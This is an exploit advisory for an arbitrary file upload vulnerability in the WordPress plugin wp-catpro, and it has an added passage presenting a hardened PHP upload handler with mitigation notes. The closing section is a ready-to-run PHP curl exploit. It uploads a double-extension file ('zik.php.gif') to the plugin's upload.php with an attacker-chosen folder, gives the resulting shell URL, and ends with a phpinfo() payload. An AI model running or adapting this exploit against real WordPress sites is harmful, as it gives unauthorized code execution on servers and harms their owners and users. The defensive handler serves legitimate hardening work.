Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability!
#-----------------------------------------------------------------------
Author => Zikou-16
Email => zikou16x@gmail.com
Tested on : Windows 7 , Backtrack 5r3
Download : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
#=> Exploit info:
------------------
# An attacker can upload file/shell.php.gif
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
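The three settings quoted above show why a name like shell.php.gif gets through: the extension whitelist is applied to the last extension only, the allowed-character pattern permits dots anywhere in the name, and (as the exploit below shows) the destination folder is taken from the request. The following is an added example of a hardened upload handler, written for this page and not code from the wp-catpro plugin; it assumes the upload arrives as $_FILES['Filedata'] like the plugin's upload.php, and the function names, the $upload_dir value and the CLI self-check names are this example's own.

```php
<?php
// Added example (not the plugin's code): hardened replacement for the
// extension / filename / folder handling described in the advisory.
// Assumes the upload arrives as $_FILES['Filedata']; all names here are ours.

$allowed_ext  = array('jpg', 'gif', 'png');               // same whitelist as the plugin
$allowed_mime = array('image/jpeg', 'image/gif', 'image/png');
$upload_dir   = __DIR__ . '/uploads/';                    // fixed server-side, never read from the request

// Reject any client-supplied name with more than one extension, so
// "shell.php.gif" is refused before the whitelist is even consulted.
function safe_extension(string $client_name, array $allowed_ext): ?string {
    $base  = basename($client_name);                      // drop any directory part
    $parts = explode('.', $base);
    if (count($parts) !== 2 || $parts[0] === '') {        // exactly "name.ext"
        return null;
    }
    $ext = strtolower($parts[1]);
    if (!preg_match('/^[a-z0-9]+$/', $ext) || !in_array($ext, $allowed_ext, true)) {
        return null;
    }
    return $ext;
}

// Check the content, not only the name: the sniffed MIME type must be in the
// whitelist and the bytes must parse as an image.
function content_matches_image(string $tmp_path, array $allowed_mime): bool {
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($tmp_path);
    if (!in_array($mime, $allowed_mime, true)) {
        return false;
    }
    return @getimagesize($tmp_path) !== false;
}

// Returns the stored path, or null when the upload is rejected.
function handle_upload(array $file, array $allowed_ext, array $allowed_mime, string $upload_dir): ?string {
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $ext = safe_extension($file['name'], $allowed_ext);
    if ($ext === null || !content_matches_image($file['tmp_name'], $allowed_mime)) {
        return null;
    }
    // Server-chosen random name: the client's filename never reaches the filesystem.
    $target = $upload_dir . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return null;
    }
    chmod($target, 0644);                                 // readable, never executable
    return $target;
}

if (isset($_FILES['Filedata'])) {
    // Web entry point: validate, store, and reveal only ok / rejected.
    $stored = handle_upload($_FILES['Filedata'], $allowed_ext, $allowed_mime, $upload_dir);
    echo $stored === null ? 'rejected' : 'ok';
} else {
    // CLI self-check on constructed names: only single-extension whitelisted names pass.
    foreach (array('photo.gif', 'shell.php.gif', 'a.phtml', '../x.png', 'noext') as $name) {
        printf("%-15s => %s\n", $name, safe_extension($name, $allowed_ext) ?? 'rejected');
    }
}
```

Two design points beyond the name check: the destination directory is hard-coded rather than read from a 'folder' field, and the stored name is generated by the server, so neither the path nor the extension can be steered by the client. Serving the upload directory with script execution disabled (for example a php_flag engine off or an equivalent handler rule) remains a worthwhile second layer, because any remaining double-extension file would then be served as a static image.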

#=> Exploit
-----------
<?php

$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

// Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>
<?php
phpinfo();
?>